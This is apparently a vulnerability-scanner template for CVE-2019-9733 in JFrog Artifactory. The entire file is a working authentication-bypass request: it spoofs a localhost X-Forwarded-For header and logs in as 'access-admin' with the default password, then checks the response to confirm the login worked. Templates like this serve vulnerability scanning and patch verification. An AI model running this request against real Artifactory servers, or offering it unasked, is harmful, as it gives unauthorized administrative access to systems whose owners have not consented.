id: cve-2019-9733
info:
  name: Artifactory Access-Admin Login Bypass
  author: akshansh
  severity: critical
requests:
  - raw:
      - |
          POST /artifactory/ui/auth/login?_spring_security_remember_me=false HTTP/1.1
          Host: {{Hostname}}
          Content-Length: 60
          Accept: application/json, text/plain, */*
          X-Requested-With: artUI
          serial: 58
          X-Forwarded-For: 127.0.0.1
          Request-Agent: artifactoryUI
          User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36
          Content-Type: application/json
          Origin: http://{{Hostname}}
          Referer: http://{{Hostname}}/artifactory/webapp/
          Accept-Encoding: gzip, deflate
          Accept-Language: en-US,en;q=0.9
          Connection: close

          {"user":"access-admin","password":"password","type":"login"}

    matchers-condition: and
    matchers:
      - type: word
        words:
          - '"username": "access-admin"'
        part: body

      - type: status
        status:
          - 200